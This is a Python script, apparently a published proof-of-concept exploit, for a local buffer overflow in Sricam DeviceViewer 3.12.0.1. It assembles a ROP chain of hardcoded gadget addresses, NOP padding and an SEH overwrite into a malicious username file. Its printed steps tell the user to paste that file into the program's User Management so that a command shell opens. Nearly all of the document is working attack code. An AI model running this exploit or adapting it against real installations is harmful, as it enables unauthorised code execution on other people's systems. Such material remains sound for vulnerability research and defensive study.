from struct import pack, unpack
def create_rop_chain():
rops = [
0x6a1142aa,
0x6a569810,
0x6ae9c126,
0x6a5dac8a,
0xff9b929d,
0x6a2420e8,
0x6994766b,
0x6a2420ea,
0x6a2420ea,
0x6a2420ea,
0x6a2420ea,
0x6a2420ea,
0x6a2420ea,
0x6a2420ea,
0x6a2420ea,
0x6a2420ea,
0x6a2420ea,
0x6a2420ea,
0x6a2420ea,
0x6a2420ea,
0x6a2420ea,
0x6a2420ea,
0x6a2420ea,
0x6a18e062,
0x6a2420ea,
0x6a45e446,
0x6a29d716,
0x6a569810,
0x6a36264a,
0x6a5dac8a,
0x76e33231,
0x6a150411,
0x6a5dac8a,
0xffffffff,
0x6a2420e8,
0x6a5eb992,
0x6a2420ea,
0x6a2420ea,
0x6a2420ea,
0x6a2420ea,
]
return ''.join(pack('<I', _) for _ in rops)
def nops(length):
return "\x90" * length
rop_chain = create_rop_chain()
maxlen = 5000
seh = pack("<I", 0x6a443e58)
nseh = nops(4)
payload = nops(8) + rop_chain + nops(360 - len(rop_chain) - 8) + nops(20) + nseh + seh + nops(300)
sec = maxlen - len(payload)
payload += nops(sec)
print("Exploit Length: " + str(len(payload)))
try:
fname = "exprop.txt"
exploit = open(fname,"w")
print("Sricam DeviceViewer 3.12.0.1 Local Buffer Overflow Exploit")
print("Author: Alessandro Magnosi\n")
print("[*] Creating evil username")
exploit.write(payload)
exploit.close()
print("[+] Username file created\n")
print("[i] Now go to 'User Management' and try to add a user with user=<filecontent>")
print("[+] A command shell will open")
except:
print("[!] Error creating the file")